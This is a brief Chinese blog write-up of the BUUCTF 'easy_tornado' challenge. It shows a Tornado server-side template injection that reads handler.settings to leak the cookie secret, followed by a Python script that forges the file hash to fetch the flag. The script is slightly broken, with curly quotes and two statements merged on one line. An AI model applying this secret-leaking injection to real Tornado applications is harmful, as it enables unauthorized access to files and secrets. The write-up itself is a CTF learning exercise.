webBUUCTF-easy_tornado

Posted 2022-10-28 yichen115

 

打开看到有三个文件：

 

三个文件内容如下：

 

通过 url 知道，访问一个文件需要知道：filename 跟 filehash

 

企图直接访问是不行的，想到了 burp 抓包，但是抓了半天没抓到，看了网上的 wp 是 模版注入

 

tornado 是一个 python 的模板，welcome.txt 中的 render 是 python 中的一个渲染函数，

报错时候的 url 是这样的

 

尝试把后面换成：111，输出了！

 

在 tornado 模板中，存在一些可以访问的快速对象，例如：

 <title>
      escape(handler.settings["cookie"]) 
 </title>

 

那么输入：handler.settings

 

拿到 cookie 就 OK 了！

import hashlib
def md5value(s):
    md5 = hashlib.md5() 
    md5.update(s) 
    return md5.hexdigest()
def jiami(): 
    filename = ‘/fllllllllllllag‘
    cookie_s ="ea7d75de-4ca5-486a-a69c-e690f3a8c217"
    print(md5value(filename.encode(‘utf-8‘)))
    x=md5value(filename.encode(‘utf-8‘))
    y=cookie_s+xprint(md5value(y.encode(‘utf-8‘)))
jiami()